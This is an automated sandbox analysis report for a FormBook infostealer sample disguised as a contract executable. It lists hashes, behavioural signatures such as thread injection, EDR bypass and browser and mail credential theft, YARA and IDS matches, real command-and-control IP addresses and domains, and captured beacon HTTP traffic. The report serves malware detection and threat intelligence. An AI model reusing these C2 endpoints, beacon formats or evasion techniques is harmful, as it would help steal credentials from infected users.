Windows Analysis Report
draft contract for order #782334.exe

Overview

General Information

Sample name: draft contract for order #782334.exe
Analysis ID: 1546621
MD5: dab7306baf4c0e52d2357f48b7a12911
SHA1: 52c04bd5512ba50072c4169bd6bf54af7b3557ee
SHA256: c55ad029c3701a693dd7bebefc90a13766f75972819faacc93fd1b57039f26b6
Tags: exe, Formbook, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • draft contract for order #782334.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\draft contract for order #782334.exe" MD5: DAB7306BAF4C0E52D2357F48B7A12911)
    • draft contract for order #782334.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\draft contract for order #782334.exe" MD5: DAB7306BAF4C0E52D2357F48B7A12911)
      • RprkEKYwQARXc.exe (PID: 4444 cmdline: "C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PATHPING.EXE (PID: 3512 cmdline: "C:\Windows\SysWOW64\PATHPING.EXE" MD5: 078AD26F906EF2AC1661FCAC84084256)
          • RprkEKYwQARXc.exe (PID: 3608 cmdline: "C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.draft contract for order #782334.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.draft contract for order #782334.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched


                AV Detection

                Source: draft contract for order #782334.exe, ReversingLabs: Detection: 65%
                Source: Yara match, File source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: draft contract for order #782334.exe, Joe Sandbox ML: detected
                Source: draft contract for order #782334.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: draft contract for order #782334.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: pathping.pdb source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RprkEKYwQARXc.exe, 00000006.00000000.2004979682.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4134690606.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdbSHA256 source: draft contract for order #782334.exe
                Source: Binary string: wntdll.pdb source: draft contract for order #782334.exe, draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdb source: draft contract for order #782334.exe
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Code function: 7_2_02BBC160 FindFirstFileW,FindNextFileW,FindClose, 7_2_02BBC160
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Code function: 4x nop then xor eax, eax, 7_2_02BA9DD0
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Code function: 4x nop then mov ebx, 00000004h, 7_2_035004DE

                Networking

                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62694 -> 172.67.131.32:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62633 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62633 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62726 -> 172.67.131.32:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62737 -> 172.67.131.32:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62737 -> 172.67.131.32:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62821 -> 103.191.208.137:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62821 -> 103.191.208.137:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62789 -> 103.191.208.137:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62908 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62915 -> 38.47.232.160:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62805 -> 103.191.208.137:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62919 -> 34.92.109.131:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62903 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62923 -> 162.0.211.143:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62931 -> 185.68.16.94:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62909 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62910 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62918 -> 38.47.232.160:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62938 -> 163.44.176.12:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62940 -> 199.59.243.227:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62922 -> 34.92.109.131:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62922 -> 34.92.109.131:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62910 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62938 -> 163.44.176.12:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62914 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62914 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62932 -> 185.68.16.94:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62924 -> 162.0.211.143:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62921 -> 34.92.109.131:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62920 -> 34.92.109.131:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62918 -> 38.47.232.160:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62912 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62939 -> 199.59.243.227:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62917 -> 38.47.232.160:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62937 -> 163.44.176.12:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62941 -> 199.59.243.227:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62933 -> 185.68.16.94:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62927 -> 195.110.124.133:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62916 -> 38.47.232.160:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62913 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62935 -> 163.44.176.12:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62934 -> 185.68.16.94:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62925 -> 162.0.211.143:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62934 -> 185.68.16.94:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62946 -> 103.233.82.58:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62710 -> 172.67.131.32:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62936 -> 163.44.176.12:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62946 -> 103.233.82.58:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62928 -> 195.110.124.133:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62944 -> 103.233.82.58:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62773 -> 103.191.208.137:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62926 -> 162.0.211.143:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62926 -> 162.0.211.143:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62942 -> 199.59.243.227:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62930 -> 195.110.124.133:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62942 -> 199.59.243.227:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62930 -> 195.110.124.133:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62943 -> 103.233.82.58:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62911 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62945 -> 103.233.82.58:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62929 -> 195.110.124.133:80
                Source: DNS query: www.deepfy.xyz
                Source: DNS query: www.cmdh1c.xyz
                Source: Joe Sandbox View, IP Address: 195.110.124.133 195.110.124.133
                Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox View, ASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox View, ASN Name: REGISTER-ASIT REGISTER-ASIT
                Source: Joe Sandbox View, ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:62632
                Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49735
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownHTTP traffic detected: POST /c2q3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.7wkto5nk230724z.clickOrigin: http://www.7wkto5nk230724z.clickReferer: http://www.7wkto5nk230724z.click/c2q3/Content-Length: 203Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 73 6e 30 50 4c 4e 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 59 56 5a 74 59 59 4e 6d 51 77 4a 6d 35 6a 73 6a 7a 75 67 79 4c 4a 66 6b 6b 42 50 79 50 73 63 43 57 31 74 55 6f 31 74 73 53 50 52 4f 59 64 52 2f 63 47 61 77 77 78 5a 4f 37 59 51 74 62 2b 73 52 37 31 52 31 5a 35 78 64 30 4c 36 68 74 59 6a 58 41 30 57 42 57 43 73 77 33 77 74 79 6d 61 6b 66 76 73 7a 30 75 6b 67 55 41 73 6f 4f 75 6a 4c 57 44 71 31 45 68 46 71 7a 79 6a 4d 4d 44 72 74 76 52 73 74 58 6d 6f 2b 57 41 42 4b 55 72 4e 34 6e 57 4c 35 31 50 51 4b 6a 67 67 33 51 61 34 4c 6c 42 64 71 6b 68 70 57 45 67 53 53 33 44 77 41 66 39 43 79 2b 67 3d 3d Data Ascii: sn0PLN=u9cGq9OyFpd1FYVZtYYNmQwJm5jsjzugyLJfkkBPyPscCW1tUo1tsSPROYdR/cGawwxZO7YQtb+sR71R1Z5xd0L6htYjXA0WBWCsw3wtymakfvsz0ukgUAsoOujLWDq1EhFqzyjMMDrtvRstXmo+WABKUrN4nWL51PQKjgg3Qa4LlBdqkhpWEgSS3DwAf9Cy+g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qwz%2F9cMho692HHhfSsYXNYedg5oMgLa6LGMSoRh%2BGZPzwY8fJEjexmpmjQFVeKGq3AcIDUAit2DjHuM1w3Uko3Zj0%2FeSV2YVIy0dM33dOwEVL2XciBb1VeojOGNnGpNEBdWmDZXlU5QG5SX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba73d3aa426bd2-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdwCCaDy487UPnK0%2BGuRiSu6SDyj8p7yfiZVef6pMZRhenlKR%2BYs70%2B6O73FMIBG71Qlbg4sjiMqIrdRPG%2FrZD%2BSNUHoQg5%2FH6D05STBYE0ZZDmy8Rk0TIumR2phO8BKBWrdfy5WtZ0us2XL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba73e389eb461a-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RA%2FLffMnzwoLayDK0zaK%2F7WsIs%2F0tR3hjjKdxMjZLumfZAZa2tnPYmRysmVBIEceFE%2Fqd1Y2zf6GHzfdx32LFXUHcTHQLOTkirnuFvpgjcr0HzbHbRuVVTTyTOxl2dfd%2FxTW2PIgYTd3cop"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba73f37ef86bc2-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=944&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10913&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C0W6XyshX0KiHwYowSrAyRyzeAHishgVefMvUPUNVT9GX7Vr9iceEMCflrliOG8oJIB3O23QUgWPTMBYjoM7j%2FOaUpM8AAP3ikPz6O8nLBHYB4Wdbl1geA1Bv47Wa9CW3ze7w23CMkF%2B4QYr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba7403992a2e78-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:16 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
